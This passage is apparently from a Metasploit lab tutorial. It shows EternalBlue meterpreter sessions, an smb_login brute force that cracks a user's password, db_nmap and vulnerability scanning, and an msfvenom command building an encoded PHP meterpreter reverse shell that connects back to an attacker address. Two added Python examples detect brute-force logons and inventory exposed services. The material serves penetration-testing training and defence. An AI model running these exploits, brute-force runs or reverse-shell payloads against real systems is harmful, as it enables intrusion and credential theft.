msf5 exploit(windows/smb/ms17_010_eternalblue) > 

Alternatively, CTRL+Z can be used to background sessions.

The sessions command can be used from the msfconsole prompt or any context to see the existing sessions.

msf5 exploit(windows/smb/ms17_010_eternalblue) > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -> 10.10.12.229:49163 (10.10.12.229)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -> 10.10.12.229:49186 (10.10.12.229)

msf5 exploit(windows/smb/ms17_010_eternalblue) > back
msf5 > sessions 

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -> 10.10.12.229:49163 (10.10.12.229)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -> 10.10.12.229:49186 (10.10.12.229)

msf5 >

To interact with any session, you can use the sessions -i command followed by the desired session number.

msf5 > sessions

Active sessions
===============

  Id  Name  Type                     Information                   Connection
  --  ----  ----                     -----------                   ----------
  1         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -> 10.10.12.229:49163 (10.10.12.229)
  2         meterpreter x64/windows  NT AUTHORITY\SYSTEM @ JON-PC  10.10.44.70:4444 -> 10.10.12.229:49186 (10.10.12.229)

msf5 > sessions -i 2
[*] Starting interaction with 2...

meterpreter >

Example of scanning and brute-forcing SMB logins with the smb_login module:

msf6 > search smb_login

Matching Modules
================

   #  Name                             Disclosure Date  Rank    Check  Description
   -  ----                             ---------------  ----    -----  -----------
   0  auxiliary/scanner/smb/smb_login                   normal  No     SMB Login Check Scanner


Interact with a module by name or index. For example info 0, use 0 or use auxiliary/scanner/smb/smb_login

msf6 > use auxiliary/scanner/smb/smb_login
msf6 auxiliary(scanner/smb/smb_login) > show options

Module options (auxiliary/scanner/smb/smb_login):

   Name               Current Setting  Required  Description
   ----               ---------------  --------  -----------
   ABORT_ON_LOCKOUT   false            yes       Abort the run when an account lockout is detected
   BLANK_PASSWORDS    false            no        Try blank passwords for all users
   BRUTEFORCE_SPEED   5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS       false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS        false            no        Add all passwords in the current database to the list
   DB_ALL_USERS       false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING   none             no        Skip existing credentials stored in the current database (Accepted: none, user, user&realm)
   DETECT_ANY_AUTH    false            no        Enable detection of systems accepting any authentication
   DETECT_ANY_DOMAIN  false            no        Detect if domain is required for the specified user
   PASS_FILE                           no        File containing passwords, one per line
   PRESERVE_DOMAINS   true             no        Respect a username that contains a domain name.
   Proxies                             no        A proxy chain of format type:host:port[,type:host:port][...]
   RECORD_GUEST       false            no        Record guest-privileged random logins to the database
   RHOSTS                              yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
   RPORT              445              yes       The SMB service port (TCP)
   SMBDomain          .                no        The Windows domain to use for authentication
   SMBPass                             no        The password for the specified username
   SMBUser                             no        The username to authenticate as
   STOP_ON_SUCCESS    false            yes       Stop guessing when a credential works for a host
   THREADS            1                yes       The number of concurrent threads (max one per host)
   USERPASS_FILE                       no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS       false            no        Try the username as the password for all users
   USER_FILE                           no        File containing usernames, one per line
   VERBOSE            true             yes       Whether to print output for all attempts

msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE /media/psf/Home/Downloads/MetasploitWordlist.txt
PASS_FILE => /media/psf/Home/Downloads/MetasploitWordlist.txt
msf6 auxiliary(scanner/smb/smb_login) > set SMBUser penny
SMBUser => penny
msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.10.183.196
RHOSTS => 10.10.183.196
msf6 auxiliary(scanner/smb/smb_login) > RUN
[-] Unknown command: RUN
msf6 auxiliary(scanner/smb/smb_login) > run

[*] 10.10.183.196:445     - 10.10.183.196:445 - Starting SMB login bruteforce
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:95',
[!] 10.10.183.196:445     - No active DB -- Credential data will not be saved!
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:98',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:2003',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:2008',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:111111',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:123456',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:12345678',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:1qaz2wsx',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:abc',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:abc123',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:abcd123',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:account',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:admin',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:adminadmin',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:administator',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:admins',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:air',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:alpine',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:Autumn2013',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:autumn2013',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:Autumn2014',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:autumn2014',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:Autumn2015',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:autumn2015',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:Autumn2016',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:autumn2016',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:Autumn2017',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:autumn2017',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:bankbank',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:baseball',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:basketball',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:bird',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:burp',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:change',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:changelater',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:changeme',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:company',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:company!',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:company1',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:company1!',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:company123',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:complex',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:complex1',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:complex2',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:complex3',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:complexpassword',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:database',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:default',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:dev',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:devdev',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:devdevdev',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:dirt',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:dragon',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:earth',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:fire',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:football',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:goat',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:goat',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:god',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:guessme',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:hugs',
[-] 10.10.183.196:445     - 10.10.183.196:445 - Failed: '.\penny:letmein',
[+] 10.10.183.196:445     - 10.10.183.196:445 - Success: '.\penny:leo1234'
[*] 10.10.183.196:445     - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 auxiliary(scanner/smb/smb_login) > 
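The run above is what the attacker sees; the target records the same activity as a burst of failed logons followed by one success. The following detection logic is an added example, not part of the TryHackMe room or of Metasploit. The log lines are constructed to resemble what a Windows Security log would hold (event 4625 for a failed logon, 4624 for a successful one) while smb_login is guessing; the pipe-separated field layout is this example's own assumption, not a real export format.

```python
"""Detect password guessing against SMB from authentication logs.

Added example (not TryHackMe or Metasploit code). The sample log is
constructed; the "timestamp|event_id|source_ip|target_user" layout
is an assumption made for this example.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed sample log: a short guessing burst from one source that
# ends in a successful logon, plus unrelated activity from another host.
SAMPLE_LOG = """\
2021-08-20T02:10:01|4625|10.10.44.70|penny
2021-08-20T02:10:01|4625|10.10.44.70|penny
2021-08-20T02:10:02|4625|10.10.44.70|penny
2021-08-20T02:10:02|4625|10.10.44.70|penny
2021-08-20T02:10:03|4625|10.10.44.70|penny
2021-08-20T02:10:03|4625|10.10.44.70|penny
2021-08-20T02:10:04|4624|10.10.44.70|penny
2021-08-20T02:30:00|4625|10.10.9.8|jon
2021-08-20T02:45:00|4624|10.10.9.8|jon
"""

FAILED_LOGON = 4625   # Windows Security event: an account failed to log on
SUCCESS_LOGON = 4624  # Windows Security event: an account was logged on


def parse_log(text):
    """Turn the constructed log into (time, event_id, source, user) tuples."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, eid, src, user = line.split("|")
        events.append((datetime.fromisoformat(ts), int(eid), src, user))
    return events


def detect_bruteforce(events, threshold=5, window=timedelta(minutes=5)):
    """Flag sources with >= threshold failures inside a sliding window.

    A success from a source that is already bursting is recorded as
    success_after=True: that is a guessed password, not a lockout.
    Returns {source_ip: {"failures": n, "users": set, "success_after": bool}}.
    """
    recent = defaultdict(deque)  # source -> timestamps of failures in window
    alerts = {}
    for ts, eid, src, user in sorted(events):
        if eid == FAILED_LOGON:
            q = recent[src]
            q.append(ts)
            while q and ts - q[0] > window:
                q.popleft()  # drop failures that fell out of the window
            if len(q) >= threshold:
                a = alerts.setdefault(
                    src, {"failures": 0, "users": set(), "success_after": False})
                a["failures"] = len(q)
                a["users"].add(user)
        elif eid == SUCCESS_LOGON and src in alerts:
            alerts[src]["success_after"] = True
            alerts[src]["users"].add(user)
    return alerts


if __name__ == "__main__":
    for src, a in detect_bruteforce(parse_log(SAMPLE_LOG)).items():
        print(f"{src}: {a['failures']} failures, users={sorted(a['users'])}, "
              f"success_after={a['success_after']}")
```

The threshold and window are tuning knobs; the module's own ABORT_ON_LOCKOUT option shows why an account lockout policy matters on the defensive side, since it stops the run after a handful of attempts and produces exactly the failure burst this rule looks for.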

The Metasploit Database

You will first need to start the PostgreSQL database, which Metasploit uses, with the following command: systemctl start postgresql

Then you will need to initialize the Metasploit Database using the msfdb init command.

root@kali:~# systemctl start postgresql 
root@kali:~# msfdb init
[i] Database already started
[+] Creating database user 'msf'
[+] Creating databases 'msf'
[+] Creating databases 'msf_test'
[+] Creating configuration file '/usr/share/metasploit-framework/config/database.yml'
[+] Creating initial database schema
/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.3/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil
root@kali:~#

You can now launch msfconsole and check the database status using the db_status command.

msf6 > db_status
[*] Connected to msf. Connection type: postgresql.
msf6 >

The database feature will allow you to create workspaces to isolate different projects. When first launched, you should be in the default workspace. You can list available workspaces using the workspace command.

msf6 > workspace
* default
msf6 >

You can add a workspace using the -a parameter or delete one using the -d parameter. The output below shows that a new workspace named "tryhackme" was created.

msf6 > workspace -a tryhackme
[*] Added workspace: tryhackme
[*] Workspace: tryhackme
msf5 > workspace
default
* tryhackme
msf6 >

You will also notice that the new workspace name is printed in red and prefixed with a * symbol, which marks the currently active workspace.

You can use the workspace command to navigate between workspaces simply by typing workspace followed by the desired workspace name.

msf6 > workspace
default
* tryhackme
msf5 > workspace default
[*] Workspace: default
msf5 > workspace 
tryhackme
* default
msf6 >

You can use the workspace -h command to list available options for the workspace command.

msf6 > workspace -h
Usage:
workspace                  List workspaces
workspace -v               List workspaces verbosely
workspace [name]           Switch workspace
workspace -a [name] ...    Add workspace(s)
workspace -d [name] ...    Delete workspace(s)
workspace -D               Delete all workspaces
workspace -r     Rename workspace
workspace -h               Show this help information

Unlike regular Metasploit usage, once Metasploit is launched with a database connected, the help command will also show the Database Backend Commands menu.

Database Backend Commands
=========================

Command           Description
-------           -----------
analyze           Analyze database information about a specific address or address range
db_connect        Connect to an existing data service
db_disconnect     Disconnect from the current data service
db_export         Export a file containing the contents of the database
db_import         Import a scan result file (filetype will be auto-detected)
db_nmap           Executes nmap and records the output automatically
db_rebuild_cache  Rebuilds the database-stored module cache (deprecated)
db_remove         Remove the saved data service entry
db_save           Save the current data service connection as the default to reconnect on startup
db_status         Show the current data service status
hosts             List all hosts in the database
loot              List all loot in the database
notes             List all notes in the database
services          List all services in the database
vulns             List all vulnerabilities in the database
workspace         Switch between database workspaces

If you run an Nmap scan using the db_nmap command, as shown below, all results will be saved to the database.

msf6 > db_nmap -sV -p- 10.10.12.229
[*] Nmap: Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-20 03:15 UTC
[*] Nmap: Nmap scan report for ip-10-10-12-229.eu-west-1.compute.internal (10.10.12.229)
[*] Nmap: Host is up (0.00090s latency).
[*] Nmap: Not shown: 65526 closed ports
[*] Nmap: PORT      STATE SERVICE            VERSION
[*] Nmap: 135/tcp   open  msrpc              Microsoft Windows RPC
[*] Nmap: 139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
[*] Nmap: 445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
[*] Nmap: 3389/tcp  open  ssl/ms-wbt-server?
[*] Nmap: 49152/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49153/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49154/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49158/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: 49162/tcp open  msrpc              Microsoft Windows RPC
[*] Nmap: MAC Address: 02:CE:59:27:C8:E3 (Unknown)
[*] Nmap: Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 94.91 seconds
msf6 >

You can now retrieve information about hosts and the services running on them with the hosts and services commands, respectively.

msf6 > hosts

Hosts
=====

address       mac                name                                        os_name  os_flavor  os_sp  purpose  info  comments
-------       ---                ----                                        -------  ---------  -----  -------  ----  --------
10.10.12.229  02:ce:59:27:c8:e3  ip-10-10-12-229.eu-west-1.compute.internal  Unknown                    device         

msf6 > services
Services
========

host          port   proto  name               state  info
----          ----   -----  ----               -----  ----
10.10.12.229  135    tcp    msrpc              open   Microsoft Windows RPC
10.10.12.229  139    tcp    netbios-ssn        open   Microsoft Windows netbios-ssn
10.10.12.229  445    tcp    microsoft-ds       open   Microsoft Windows 7 - 10 microsoft-ds workgroup: WORKGROUP
10.10.12.229  3389   tcp    ssl/ms-wbt-server  open   
10.10.12.229  49152  tcp    msrpc              open   Microsoft Windows RPC
10.10.12.229  49153  tcp    msrpc              open   Microsoft Windows RPC
10.10.12.229  49154  tcp    msrpc              open   Microsoft Windows RPC
10.10.12.229  49158  tcp    msrpc              open   Microsoft Windows RPC
10.10.12.229  49162  tcp    msrpc              open   Microsoft Windows RPC

msf6 >

The hosts -h and services -h commands can help you become more familiar with available options.

Once the host information is stored in the database, you can use the hosts -R command to set the RHOSTS parameter to the stored host addresses.

Example Workflow

  1. We select the vulnerability scanning module that finds potential MS17-010 vulnerabilities with the use auxiliary/scanner/smb/smb_ms17_010 command.
  2. We set the RHOSTS value using hosts -R.
  3. We type show options to check that all values were assigned correctly. (In this example, 10.10.138.32 is the IP address we scanned earlier using the db_nmap command.)
  4. Once all parameters are set, we launch the module using the run or exploit command.

msf6 > use auxiliary/scanner/smb/smb_ms17_010 
msf5 auxiliary(scanner/smb/smb_ms17_010) > hosts -R 

Hosts
=====

address       mac                name                                        os_name  os_flavor  os_sp  purpose  info  comments
-------       ---                ----                                        -------  ---------  -----  -------  ----  --------
10.10.12.229  02:ce:59:27:c8:e3  ip-10-10-12-229.eu-west-1.compute.internal  Unknown                    device         

RHOSTS => 10.10.12.229

msf6 auxiliary(scanner/smb/smb_ms17_010) > show options 

Module options (auxiliary/scanner/smb/smb_ms17_010):

Name         Current Setting                                                 Required  Description
----         ---------------                                                 --------  -----------
CHECK_ARCH   true                                                            no        Check for architecture on vulnerable hosts
CHECK_DOPU   true                                                            no        Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE   false                                                           no        Check for named pipe on vulnerable hosts
NAMED_PIPES  /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
RHOSTS       10.10.12.229                                                    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT        445                                                             yes       The SMB service port (TCP)
SMBDomain    .                                                               no        The Windows domain to use for authentication
SMBPass                                                                      no        The password for the specified username
SMBUser                                                                      no        The username to authenticate as
THREADS      1                                                               yes       The number of concurrent threads (max one per host)

msf6 auxiliary(scanner/smb/smb_ms17_010) > run

If there is more than one host saved to the database, all IP addresses will be used when the hosts -R command is used.

In a typical penetration testing engagement, we could have the following scenario:

  • Finding available hosts using the db_nmap command
  • Scanning these for further vulnerabilities or open ports (using a port scanning module)

The services command used with the -S parameter will allow you to search for specific services in the environment.

msf6 > services -S netbios                                                                                       
Services                                                                                                             
========                                                                                                             

host          port  proto  name         state  info                                                                              
----          ----  -----  ----         -----  ----                                                                              
10.10.12.229  139   tcp    netbios-ssn  open   Microsoft Windows netbios-ssn

msf6 >

You may want to look for low-hanging fruit such as:

  • HTTP: Could host a web application where you can find vulnerabilities like SQL injection or Remote Code Execution (RCE).
  • FTP: Could allow anonymous login and provide access to interesting files.
  • SMB: Could be vulnerable to SMB exploits like MS17-010.
  • SSH: Could have default or easy-to-guess credentials.
  • RDP: Could be vulnerable to BlueKeep or allow desktop access if weak credentials were used.

As you can see, Metasploit has many features to aid in engagements, such as the ability to compartmentalize your engagements into workspaces, analyze your results at a high level, and quickly import and explore data.
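The hosts and services tables above are what db_nmap (or db_import of an Nmap XML file) populates, and services -S is a substring search over them. As an added example, not Metasploit's own db_import code, the script below builds the same two tables from Nmap XML with the standard library, reproduces the -S filter, and applies the "low-hanging fruit" categories from the list above to decide which open services deserve a hardening review first. The XML is constructed to mirror the scan on this page (plus one closed port) and is not a real Nmap export; the category mapping is this example's own choice.

```python
"""Hosts/services inventory from Nmap XML, the format db_import ingests.

Added example, not Metasploit code. The XML is constructed; the
REVIEW_CATEGORIES mapping is this example's own assumption.
"""
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -p- 10.10.12.229">
  <host>
    <status state="up"/>
    <address addr="10.10.12.229" addrtype="ipv4"/>
    <address addr="02:CE:59:27:C8:E3" addrtype="mac"/>
    <hostnames><hostname name="ip-10-10-12-229.eu-west-1.compute.internal" type="PTR"/></hostnames>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="139"><state state="open"/><service name="netbios-ssn" product="Microsoft Windows netbios-ssn"/></port>
      <port protocol="tcp" portid="445"><state state="open"/><service name="microsoft-ds" product="Microsoft Windows 7 - 10 microsoft-ds"/></port>
      <port protocol="tcp" portid="3389"><state state="open"/><service name="ms-wbt-server" tunnel="ssl"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/><service name="http-proxy"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Nmap service names -> the review category from the page's list.
REVIEW_CATEGORIES = {
    "http": "HTTP", "http-proxy": "HTTP", "https": "HTTP",
    "ftp": "FTP",
    "microsoft-ds": "SMB", "netbios-ssn": "SMB",
    "ssh": "SSH",
    "ms-wbt-server": "RDP",
}


def parse_nmap_xml(xml_text):
    """Return (hosts, services) shaped like the msfconsole hosts/services tables."""
    root = ET.fromstring(xml_text)
    hosts, services = [], []
    for host in root.iter("host"):
        if host.find("status").get("state") != "up":
            continue  # db_import only records hosts that were up
        addrs = {a.get("addrtype"): a.get("addr") for a in host.findall("address")}
        name_el = host.find("hostnames/hostname")
        hosts.append({
            "address": addrs.get("ipv4"),
            "mac": (addrs.get("mac") or "").lower(),
            "name": name_el.get("name") if name_el is not None else "",
        })
        for port in host.findall("ports/port"):
            svc = port.find("service")
            services.append({
                "host": addrs.get("ipv4"),
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": svc.get("name") if svc is not None else "",
                "state": port.find("state").get("state"),
                "info": svc.get("product", "") if svc is not None else "",
            })
    return hosts, services


def search_services(services, pattern):
    """Equivalent of `services -S <pattern>`: substring match on name or info."""
    p = pattern.lower()
    return [s for s in services if p in s["name"].lower() or p in s["info"].lower()]


def review_targets(services):
    """Open services in a category that attackers probe first, sorted by host/port."""
    return sorted(
        (s["host"], s["port"], REVIEW_CATEGORIES[s["name"]])
        for s in services
        if s["state"] == "open" and s["name"] in REVIEW_CATEGORIES
    )


if __name__ == "__main__":
    hosts, services = parse_nmap_xml(SAMPLE_NMAP_XML)
    print(hosts)
    print(search_services(services, "netbios"))
    print(review_targets(services))
```

Closed ports are kept in the services list, as Metasploit does, but excluded from the review list; only open SMB and RDP ports surface for this host, which is the same prioritisation the low-hanging-fruit list suggests.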

Vulnerability scanning

Metasploit allows you to quickly identify some critical vulnerabilities that could be considered as “low hanging fruit”. The term “low hanging fruit” usually refers to easily identifiable and exploitable vulnerabilities that could potentially allow you to gain a foothold on a system and, in some cases, gain high-level privileges such as root or administrator.

Finding vulnerabilities using Metasploit will rely heavily on your ability to scan and fingerprint the target. The better you are at these stages, the more options Metasploit may provide you. For example, if you identify a VNC service running on the target, you may use the search function in Metasploit to list useful modules. The results will also contain payload and post modules; at this stage, those are not very useful, as we have not discovered a potential exploit to use just yet. However, in the case of VNC, there are several scanner modules that we can use.

msf6 > use auxiliary/scanner/vnc/
use auxiliary/scanner/vnc/ard_root_pw    use auxiliary/scanner/vnc/vnc_login      use auxiliary/scanner/vnc/vnc_none_auth
msf6 > use auxiliary/scanner/vnc/

You can use the info command for any module to have a better understanding of its use and purpose.

msf6 auxiliary(scanner/vnc/vnc_login) > info

       Name: VNC Authentication Scanner
     Module: auxiliary/scanner/vnc/vnc_login
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  carstein 
  jduck 

Check supported:
  No

Basic options:
  Name              Current Setting                                                  Required  Description
  ----              ---------------                                                  --------  -----------
  BLANK_PASSWORDS   false                                                            no        Try blank passwords for all users
  BRUTEFORCE_SPEED  5                                                                yes       How fast to bruteforce, from 0 to 5
  DB_ALL_CREDS      false                                                            no        Try each user/password couple stored in the current database
  DB_ALL_PASS       false                                                            no        Add all passwords in the current database to the list
  DB_ALL_USERS      false                                                            no        Add all users in the current database to the list
  PASSWORD                                                                           no        The password to test
  PASS_FILE         /opt/metasploit-framework-5101/data/wordlists/vnc_passwords.txt  no        File containing passwords, one per line
  Proxies                                                                            no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                                                                             yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
  RPORT             5900                                                             yes       The target port (TCP)
  STOP_ON_SUCCESS   false                                                            yes       Stop guessing when a credential works for a host
  THREADS           1                                                                yes       The number of concurrent threads (max one per host)
  USERNAME                                                                    no        A specific username to authenticate as
  USERPASS_FILE                                                                      no        File containing users and passwords separated by space, one pair per line
  USER_AS_PASS      false                                                            no        Try the username as the password for all users
  USER_FILE                                                                          no        File containing usernames, one per line
  VERBOSE           true                                                             yes       Whether to print output for all attempts

Description:
  This module will test a VNC server on a range of machines and report 
  successful logins. Currently it supports RFB protocol version 3.3, 
  3.7, 3.8 and 4.001 using the VNC challenge response authentication 
  method.

References:
  https://cvedetails.com/cve/CVE-1999-0506/

msf6 auxiliary(scanner/vnc/vnc_login) >

As you can see, the vnc_login module can help us find login details for the VNC service.

Msfvenom

Msfvenom, which replaced Msfpayload and Msfencode, allows you to generate payloads.

Msfvenom will allow you to access all payloads available in the Metasploit framework. Msfvenom allows you to create payloads in many different formats (PHP, exe, dll, elf, etc.) and for many different target systems (Apple, Windows, Android, Linux, etc.).

root@ip-10-10-186-44:~# msfvenom -l payloads 

Framework Payloads (562 total) [--payload ]
==================================================

    Name                                                Description
    ----                                                -----------
    aix/ppc/shell_bind_tcp                              Listen for a connection and spawn a command shell
    aix/ppc/shell_find_port                             Spawn a shell on an established connection
    aix/ppc/shell_interact                              Simply execve /bin/sh (for inetd programs)
    aix/ppc/shell_reverse_tcp                           Connect back to attacker and spawn a command shell
    android/meterpreter/reverse_http                    Run a meterpreter server in Android. Tunnel communication over HTTP
    android/meterpreter/reverse_https                   Run a meterpreter server in Android. Tunnel communication over HTTPS
    android/meterpreter/reverse_tcp                     Run a meterpreter server in Android. Connect back stager
    android/meterpreter_reverse_http                    Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_https                   Connect back to attacker and spawn a Meterpreter shell
    android/meterpreter_reverse_tcp                     Connect back to the attacker and spawn a Meterpreter shell
    android/shell/reverse_http                          Spawn a piped command shell (sh). Tunnel communication over HTTP
    android/shell/reverse_https                         Spawn a piped command shell (sh). Tunnel communication over HTTPS
    android/shell/reverse_tcp                           Spawn a piped command shell (sh). Connect back stager
    apple_ios/aarch64/meterpreter_reverse_http          Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/aarch64/meterpreter_reverse_https         Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/aarch64/meterpreter_reverse_tcp           Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/aarch64/shell_reverse_tcp                 Connect back to attacker and spawn a command shell
    apple_ios/armle/meterpreter_reverse_http            Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/armle/meterpreter_reverse_https           Run the Meterpreter / Mettle server payload (stageless)
    apple_ios/armle/meterpreter_reverse_tcp             Run the Meterpreter / Mettle server payload (stageless)

Output formats

You can either generate stand-alone payloads (e.g. a Windows executable for Meterpreter) or get a usable raw format (e.g. python). The msfvenom --list formats command can be used to list supported output formats.

Encoders

Contrary to some beliefs, encoders do not aim to bypass antivirus installed on the target system. As the name suggests, they encode the payload. While this can be effective against some antivirus software, using modern obfuscation techniques or learning methods to inject shellcode is a better solution to that problem. The example below shows the usage of encoding (with the -e parameter). The PHP version of Meterpreter was encoded in Base64, and the output format was raw.

root@ip-10-10-186-44:~# msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 -f raw -e php/base64
[-] No platform was selected, choosing Msf::Module::Platform::PHP from the payload
[-] No arch selected, selecting arch: php from the payload
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of php/base64
php/base64 succeeded with size 1507 (iteration=0)
php/base64 chosen with final size 1507
Payload size: 1507 bytes
